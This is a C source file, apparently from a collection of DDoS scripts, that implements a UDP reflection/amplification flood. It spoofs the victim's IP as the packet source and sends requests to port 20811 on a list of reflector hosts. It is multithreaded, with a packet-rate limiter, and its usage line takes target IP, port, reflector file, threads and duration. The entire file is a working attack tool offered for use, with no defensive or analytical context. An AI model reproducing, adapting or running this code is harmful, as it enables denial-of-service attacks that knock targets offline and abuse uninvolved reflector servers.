Path: blob/master/DDOS Scripts/AMP Methods/Ground Control Amplification/g.c
4607 views
/*1* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)2*/3#include <time.h>4#include <pthread.h>5#include <unistd.h>6#include <stdio.h>7#include <stdlib.h>8#include <string.h>9#include <sys/socket.h>10#include <netinet/ip.h>11#include <netinet/udp.h>12#include <arpa/inet.h>13#define MAX_PACKET_SIZE 819214#define PHI 0x9e3779b915static uint32_t Q[4096], c = 362436;16struct list17{18struct sockaddr_in data;19struct list *next;20struct list *prev;21};22struct list *head;23volatile int tehport;24volatile int limiter;25volatile unsigned int pps;26volatile unsigned int sleeptime = 100;27struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };28void init_rand(uint32_t x)29{30int i;31Q[0] = x;32Q[1] = x + PHI;33Q[2] = x + PHI + PHI;34for (i = 3; i < 4096; i++)35{36Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;37}38}39uint32_t rand_cmwc(void)40{41uint64_t t, a = 18782LL;42static uint32_t i = 4095;43uint32_t x, r = 0xfffffffe;44i = (i + 1) & 4095;45t = a * Q[i] + c;46c = (t >> 32);47x = t + c;48if (x < c) {49x++;50c++;51}52return (Q[i] = r - x);53}54unsigned short csum (unsigned short *buf, int nwords)55{56unsigned long sum = 0;57for (sum = 0; nwords > 0; nwords--)58sum += *buf++;59sum = (sum >> 16) + (sum & 0xffff);60sum += (sum >> 16);61return (unsigned short)(~sum);62}63void setup_ip_header(struct iphdr *iph)64{65iph->ihl = 5;66iph->version = 4;67iph->tos = 0;68iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;69iph->id = htonl(54321);70iph->frag_off = 0;71iph->ttl = MAXTTL;72iph->protocol = IPPROTO_UDP;73iph->check = 0;74iph->saddr = inet_addr("192.168.3.100");75}76void setup_udp_header(struct udphdr *udph)77{78udph->source = htons(5678);79udph->dest = htons(20811);80udph->check = 0;81memcpy((void *)udph + sizeof(struct udphdr), "0x01", 1);82udph->len=htons(sizeof(struct udphdr) + 1);83}84void *flood(void *par1)85{86struct thread_data *td = (struct thread_data *)par1;87char datagram[MAX_PACKET_SIZE];88struct iphdr *iph = (struct iphdr *)datagram;89struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);90struct sockaddr_in sin = td->sin;91struct list *list_node = td->list_node;92int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);93if(s < 0){94fprintf(stderr, "Could not open raw socket.\n");95exit(-1);96}97init_rand(time(NULL));98memset(datagram, 0, MAX_PACKET_SIZE);99setup_ip_header(iph);100setup_udp_header(udph);101udph->source = htons(rand() % 65535 - 1026);102iph->saddr = sin.sin_addr.s_addr;103iph->daddr = list_node->data.sin_addr.s_addr;104iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);105int tmp = 1;106const int *val = &tmp;107if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){108fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");109exit(-1);110}111init_rand(time(NULL));112register unsigned int i;113i = 0;114while(1){115sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));116list_node = list_node->next;117iph->daddr = list_node->data.sin_addr.s_addr;118iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);119iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);120121pps++;122if(i >= limiter)123{124i = 0;125usleep(sleeptime);126}127i++;128}129}130int main(int argc, char *argv[ ])131{132if(argc < 6){133fprintf(stderr, "Invalid parameters!\n");134fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);135exit(-1);136}137srand(time(NULL));138int i = 0;139head = NULL;140fprintf(stdout, "Setting up sockets...\n");141int max_len = 128;142char *buffer = (char *) malloc(max_len);143buffer = memset(buffer, 0x00, max_len);144int num_threads = atoi(argv[4]);145int maxpps = atoi(argv[5]);146limiter = 0;147pps = 0;148int multiplier = 20;149FILE *list_fd = fopen(argv[3], "r");150while (fgets(buffer, max_len, list_fd) != NULL) {151if ((buffer[strlen(buffer) - 1] == '\n') ||152(buffer[strlen(buffer) - 1] == '\r')) {153buffer[strlen(buffer) - 1] = 0x00;154if(head == NULL)155{156head = (struct list *)malloc(sizeof(struct list));157bzero(&head->data, sizeof(head->data));158head->data.sin_addr.s_addr=inet_addr(buffer);159head->next = head;160head->prev = head;161} else {162struct list *new_node = (struct list *)malloc(sizeof(struct list));163memset(new_node, 0x00, sizeof(struct list));164new_node->data.sin_addr.s_addr=inet_addr(buffer);165new_node->prev = head;166new_node->next = head->next;167head->next = new_node;168}169i++;170} else {171continue;172}173}174struct list *current = head->next;175pthread_t thread[num_threads];176struct sockaddr_in sin;177sin.sin_family = AF_INET;178sin.sin_addr.s_addr = inet_addr(argv[1]);179struct thread_data td[num_threads];180for(i = 0;i<num_threads;i++){181td[i].thread_id = i;182td[i].sin= sin;183td[i].list_node = current;184pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);185}186fprintf(stdout, "Starting flood...\n");187for(i = 0;i<(atoi(argv[6])*multiplier);i++)188{189usleep((1000/multiplier)*1000);190if((pps*multiplier) > maxpps)191{192if(1 > limiter)193{194sleeptime+=100;195} else {196limiter--;197}198} else {199limiter++;200if(sleeptime > 25)201{202sleeptime-=25;203} else {204sleeptime = 0;205}206}207pps = 0;208}209return 0;210}211212